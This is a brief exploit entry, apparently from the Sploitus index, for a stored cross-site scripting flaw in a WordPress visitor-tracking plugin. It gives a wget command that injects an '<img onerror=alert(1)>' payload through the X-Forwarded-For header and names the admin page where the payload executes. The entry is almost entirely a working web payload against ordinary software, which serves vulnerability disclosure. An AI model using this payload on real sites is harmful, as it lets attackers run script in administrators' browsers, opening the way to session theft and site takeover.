Share
## https://sploitus.com/exploit?id=WPEX-ID:76316621-1987-44EA-83E5-6CA884BDD1C0
wget --header="X-Forwarded-For: <img src=x onerror=alert(1)>" https://example.com -q -O-

The XSS will be triggered when an admin access the SPY Visitors page of the plugin (ie https://example.com/wp-admin/admin.php?page=wassup-spia)